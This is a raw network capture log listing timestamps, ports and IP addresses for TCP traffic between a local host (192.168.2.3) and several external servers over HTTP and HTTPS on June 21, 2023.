Jun 21, 2023 04:27:40.032874107 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.032922983 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.032969952 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.032995939 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.033019066 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.033696890 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.033745050 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.033790112 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.033833981 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.033862114 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.033926964 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.034661055 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.034710884 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.034759045 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.034806967 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.034823895 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.034853935 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.034868002 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.035573959 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.035621881 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.035643101 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.035667896 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.035712957 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.035732031 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.036674023 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.036722898 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.036755085 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.036770105 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.036818027 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.036824942 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.037585974 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.037632942 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.037662029 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.037678003 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.037723064 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.037735939 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.037770987 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.037825108 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.038542986 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.038589954 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.038634062 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.038660049 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.038681030 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.038732052 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.038736105 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.039519072 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.039567947 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.039616108 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.039630890 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.039663076 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.039669037 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.042349100 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.048634052 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.048686981 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.048732996 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.048779011 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.048794031 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.048825979 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.048832893 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.048909903 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.048959970 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.048968077 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.049005032 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049015045 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.049076080 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049124002 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049170971 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049180984 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.049216032 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049262047 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049274921 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.049309969 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049319029 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.049356937 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049402952 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049448967 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049458027 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.049495935 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049496889 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.049546003 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049592018 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049638033 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049649000 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.049685955 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049693108 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.049731970 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049781084 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049787045 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.049827099 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049874067 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049922943 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049935102 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.049969912 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.049982071 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.050017118 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050066948 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050112009 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050122976 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.050159931 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050168991 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.050205946 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050254107 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050301075 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050306082 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.050348043 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050352097 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.050395966 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050442934 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050488949 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050513983 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.050535917 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050551891 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.050584078 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050631046 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050678015 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050683022 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.050728083 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.050729990 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.051605940 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.051652908 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.051698923 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.051718950 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.051745892 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.052561998 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.052612066 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.052658081 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.052685022 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.053508997 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.053581953 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.053628922 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.053647995 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.053677082 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.053680897 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.054665089 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.054713011 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.054759026 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.054773092 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.054807901 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.054830074 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.054856062 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.054909945 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.055692911 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.055740118 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.055787086 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.055830956 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.055841923 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.055918932 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.056611061 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.056663036 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.056710958 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.056742907 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.056755066 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.056804895 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.056988955 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.057580948 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.057629108 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.057674885 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.057723045 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.057868958 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.058494091 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.058568954 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.058578014 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.058615923 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.058662891 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.058710098 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.058715105 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.058767080 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.059600115 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.059647083 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.059701920 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.059711933 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.059787989 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.207743883 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.218117952 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:40.353601933 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:40.687737942 CEST	49700	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:40.704999924 CEST	80	49700	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:40.705316067 CEST	49700	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:40.742162943 CEST	49703	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:40.759234905 CEST	80	49703	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:40.759465933 CEST	49703	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:40.759783030 CEST	49703	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:40.759828091 CEST	49703	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:40.776700020 CEST	80	49703	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:40.776791096 CEST	80	49703	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:40.888757944 CEST	80	49703	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:40.888811111 CEST	80	49703	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:40.888983965 CEST	49703	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:40.910710096 CEST	49703	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:40.910711050 CEST	49703	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:40.927829981 CEST	80	49703	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:40.927884102 CEST	80	49703	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:40.994982958 CEST	80	49703	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:40.995033026 CEST	80	49703	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:40.995935917 CEST	49703	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:41.003895998 CEST	49704	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:42.021841049 CEST	49703	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:42.038954020 CEST	80	49703	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:42.039060116 CEST	49703	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:42.064323902 CEST	49705	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:42.081698895 CEST	80	49705	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:42.081897020 CEST	49705	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:42.139024973 CEST	49706	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:42.139096975 CEST	443	49706	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:42.139206886 CEST	49706	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:42.269083977 CEST	49705	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:42.269083977 CEST	49705	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:42.286504984 CEST	80	49705	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:42.286565065 CEST	80	49705	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:42.311213017 CEST	49706	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:42.311261892 CEST	443	49706	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:42.390608072 CEST	443	49706	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:42.390779972 CEST	49706	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:42.392380953 CEST	80	49705	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:42.392441034 CEST	80	49705	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:42.392834902 CEST	49705	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:42.401287079 CEST	49706	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:42.401316881 CEST	443	49706	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:42.401747942 CEST	443	49706	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:42.401879072 CEST	49706	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:42.423103094 CEST	49706	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:42.463165045 CEST	443	49706	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:42.463296890 CEST	443	49706	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:42.463349104 CEST	49706	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:42.463502884 CEST	49706	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:42.466273069 CEST	49706	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:42.466322899 CEST	443	49706	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:42.615400076 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:42.615458012 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:42.615607023 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:42.619234085 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:42.619271040 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:42.908314943 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:42.908426046 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:42.928095102 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:42.928148985 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:42.928957939 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:42.981780052 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.471875906 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.512315989 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.606976986 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.607242107 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.607268095 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.607319117 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.607398987 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.607398987 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.607398987 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.607455015 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.716141939 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.716177940 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.739353895 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.739387035 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.739460945 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.739598036 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.739645958 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.739680052 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.739700079 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.739707947 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.739772081 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.739964008 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.739969969 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.739991903 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.740047932 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.740084887 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.740084887 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.740112066 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.740180016 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.871083021 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.871184111 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.871269941 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.871324062 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.871412992 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.871439934 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.871514082 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.871597052 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.871597052 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.871634007 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.871675968 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.871684074 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.871699095 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.871776104 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.871794939 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.871822119 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.871884108 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.872181892 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.872203112 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.872298956 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.872323036 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.872385025 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.872483969 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.872553110 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.872603893 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.872623920 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.873414993 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.873487949 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.873490095 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.873519897 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:43.873548985 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:43.873565912 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.003475904 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.003712893 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.003746033 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.003849983 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.003870010 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.004060984 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.004081964 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.004153967 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.004183054 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.004183054 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.004224062 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.004287958 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.004404068 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.004472017 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.004525900 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.004551888 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.005124092 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.005203009 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.005220890 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.005256891 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.005290031 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.005316973 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.005716085 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.005827904 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.005853891 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.006213903 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.006337881 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.006364107 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.006412983 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.006845951 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.006952047 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.006952047 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.006992102 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.007289886 CEST	443	49707	103.233.24.19	192.168.2.3
